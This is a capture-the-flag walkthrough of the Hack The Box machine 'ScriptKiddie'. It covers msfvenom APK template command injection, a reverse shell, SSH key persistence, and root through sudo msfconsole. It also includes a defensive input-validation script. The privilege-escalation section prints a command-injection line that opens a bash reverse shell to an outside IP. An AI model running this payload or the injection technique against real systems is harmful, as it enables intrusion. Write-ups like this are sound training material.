Just to make life easier I usually add an entry to my hosts file so the target machine can be reached by name.
echo "10.129.76.86 scriptkiddie.htb" >> /etc/hosts
Okay now onto the hacking!
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb
┌──(root💀kali)-[/home/…/boxes/htb/machines/scriptkiddie]
└─# nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 09:26 EST
Nmap scan report for scriptkiddie.htb (10.129.76.86)
Host is up (0.24s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Scanning & Enumeration
Based on the scan results, I saw that port 5000 was running a web server, so I went to investigate and this is what I found.
It's some kind of toolkit running on a Linux-based box that gives the user access to h4ck3r t00l5. My next step was to look at how I could abuse this to gain a reverse shell on the remote machine.
After trying out various methods such as uploading reverse shells and intercepting requests to try and find something interesting, I landed on this.
MSF Venom had a vulnerability where you could perform command injection by providing a crafted APK template while generating a payload. This site allowed me to generate my own payload using MSF Venom.
Upon finding this exploit, I fired up MSF console to generate an APK template to upload and gain reverse shell on the target box. [Link to MSF Module]
After that I uploaded the APK "template file" to the site's payload section and opened a Netcat listener on my end to catch any incoming shells.
Once I hit the generate button, my listener successfully caught a reverse shell from the remote machine which I then proceeded to stabilize with the following python mini-script...
python3 -c 'import pty; pty.spawn("/bin/bash")'
Since I had discovered that SSH was running on the server, I generated a new SSH key pair and placed the public key on the remote machine.
This allowed me to SSH into the machine as the kid user without any password authentication.
Privilege Escalation [Level 1]
Looking around the filesystem, I realized that there was another user named pwn, and in that user's home directory lived a shell script.
This shell script seemed to read IPs from a file located in kid's home directory (the user I currently owned) and run an NMAP scan against them. This script was also owned by the
My theory was to somehow add an entry to that file which would break out of the NMAP command and run bash, giving me a reverse shell as the pwn user account!
kid@scriptkiddie:~/logs$ echo "NEEPOC ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.153/9876 0>&1' #" >> hackers
And I was able to gain a shell! I then proceeded to do the same thing with the SSH keys and stabilize my shell.
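The script above was abused because a line from a user-writable file ended up inside a shell command string. The following is an added example (not the box's script, which is not reproduced here) of how that "read targets from a file, then scan them" pattern can be written so that each line must be a bare IPv4 address before it is ever passed to nmap as a single argument; the file name and the nmap flags are assumptions.

```shell
#!/bin/sh
# Added example: validate target lines before they reach a command line.
# Return 0 only if $1 is a bare dotted-quad IPv4 address (a.b.c.d, 0-255 each).
is_ipv4() {
    ip=$1
    # Reject any character other than digits and dots, and any empty field.
    case $ip in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $ip           # split on dots only; no glob characters can be present
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Read the target file line by line, print only valid addresses on stdout and
# report everything else on stderr. `read` trims surrounding blanks but keeps
# interior characters, so "10.0.0.1 ;..." still fails validation.
filter_targets() {
    while read -r line || [ -n "$line" ]; do
        if [ -n "$line" ]; then
            if is_ipv4 "$line"; then
                printf '%s\n' "$line"
            else
                printf 'rejected (not a bare IPv4 address): %s\n' "$line" >&2
            fi
        fi
    done < "$1"
}

# Hypothetical caller: each address is one argv entry. Nothing from the file is
# ever interpolated into a string that a shell re-parses (no eval, no sh -c).
scan_targets() {
    filter_targets "$1" | while read -r ip; do
        nmap -sV "$ip"
    done
}
```

Only `filter_targets` and `is_ipv4` need to run to see the effect; `scan_targets` shows where the validated values are consumed.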
Privilege Escalation [Level 2]
Lastly, the path to root on the machine was pretty straightforward. I first ran sudo -l to figure out which binaries I was able to run as root.
This revealed that I could run MSF Console with root privileges without a password. So I abused this by running MSF Console as root and invoking /bin/bash from inside it.
And that's it, I was able to root this box!